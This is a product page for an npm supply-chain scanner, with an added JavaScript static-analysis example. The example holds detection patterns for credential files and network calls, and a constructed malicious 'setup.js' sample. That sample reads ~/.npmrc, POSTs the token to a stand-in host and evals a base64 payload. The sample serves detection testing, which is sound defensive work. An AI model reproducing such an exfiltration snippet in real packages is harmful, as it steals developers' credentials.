Scan npm packages for supply-chain risk
npm packages can run code the moment you install them. Type npm:<package> and see install hooks, network calls, and obfuscated payloads — with evidence — before you add a dependency.
What it looks for in npm packages
- Install-time execution: pre/post/install lifecycle hooks in package.json — the classic supply-chain entry point.
- Obfuscated droppers: decode-and-execute chains (base64/hex) and dynamic code execution that fetch and run a second stage.
- Credential exfiltration: reading ~/.npmrc, ~/.aws, or env secrets and POSTing them to a remote endpoint (flagged as a critical sensitive-data-plus-network combination).
Capability is not risk
Plenty of legitimate packages use the filesystem and network. SkillTotal scores deliberate malicious indicators, lists powerful capabilities separately, and anchors every confirmed finding to a file and line — so a normal dependency is not flagged as malware.
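The three indicator classes listed above and the capability-versus-finding split described here, as an added example that is not SkillTotal's code: a small static triage in JavaScript that takes a package.json text and a map of source files (constructed samples included), lists capabilities separately, and scores only install hooks and the decode-plus-execute and secrets-plus-network combinations, each anchored to a file and line. The regexes, severity labels and finding names are illustrative assumptions, not the product's rules.

```javascript
// Added example, not SkillTotal's code. Input: raw package.json text plus a
// { filename: source } map. Output: capabilities (informational) and findings
// (scored), each with file + line evidence. Patterns are illustrative heuristics.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
const CAPABILITIES = {
  decode:  /Buffer\.from\([^)]*['"](?:base64|hex)['"]\)|\batob\(/,
  dynexec: /\beval\(|new Function\(|child_process|\bexecSync\(/,
  secrets: /\.npmrc|\.aws\b|process\.env\b/,
  network: /https?\.request\(|\bfetch\(|\bnet\.connect\(/,
};
const lineOf = (text, needle) => text.split('\n').findIndex((l) => l.includes(needle)) + 1;

function scanPackage(packageJsonText, files) {
  const capabilities = []; // informational: what the code *can* do
  const findings = [];     // scored: indicators of deliberate malice
  const scripts = JSON.parse(packageJsonText).scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!scripts[hook]) continue; // install-time execution is always a finding
    findings.push({ severity: 'high', kind: 'install-hook', file: 'package.json',
      line: lineOf(packageJsonText, `"${hook}"`), evidence: `${hook}: ${scripts[hook]}` });
  }
  for (const [file, src] of Object.entries(files)) {
    const first = {}; // first line on which each capability appears in this file
    src.split('\n').forEach((text, i) => {
      for (const [cap, re] of Object.entries(CAPABILITIES)) {
        if (!re.test(text)) continue;
        capabilities.push({ cap, file, line: i + 1 });
        first[cap] = first[cap] || i + 1;
      }
    });
    // Only combinations are scored: decode + dynamic execution, secrets + network.
    if (first.decode && first.dynexec) findings.push({ severity: 'high',
      kind: 'obfuscated-dropper', file, line: first.dynexec,
      evidence: `decode at line ${first.decode}, execution at line ${first.dynexec}` });
    if (first.secrets && first.network) findings.push({ severity: 'critical',
      kind: 'credential-exfiltration', file, line: first.network,
      evidence: `secret access at line ${first.secrets}, network at line ${first.network}` });
  }
  return { capabilities, findings };
}

// Constructed samples: a dropper-like package and a benign HTTP client.
const SUSPECT_PKG = '{\n  "name": "x",\n  "scripts": {\n    "postinstall": "node setup.js"\n  }\n}';
const SUSPECT_FILES = { 'setup.js': [
  "const fs = require('fs');",
  "const token = fs.readFileSync(process.env.HOME + '/.npmrc', 'utf8');",
  "fetch('https://example.invalid/c', { method: 'POST', body: token });",
  "eval(Buffer.from('Y29uc29sZS5sb2coMSk=', 'base64').toString());",
].join('\n') };
const BENIGN_FILES = { 'client.js': "const res = fetch('https://api.example.com/v1');" };
```

Running `scanPackage(SUSPECT_PKG, SUSPECT_FILES)` yields three findings (install hook at package.json line 4, dropper, critical exfiltration), while the benign client yields one `network` capability and no findings.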
FAQ
- Can I scan a specific version?
- Yes — use npm:<package>@<version>. Without a version the latest published release is analyzed.
- Does it cover postinstall scripts?
- Yes. Install-time lifecycle hooks are a first-class detection, since they execute automatically on install.
- Is my input or the package uploaded anywhere?
- The package is fetched from the public registry and analyzed statically — never executed, never sent to an LLM.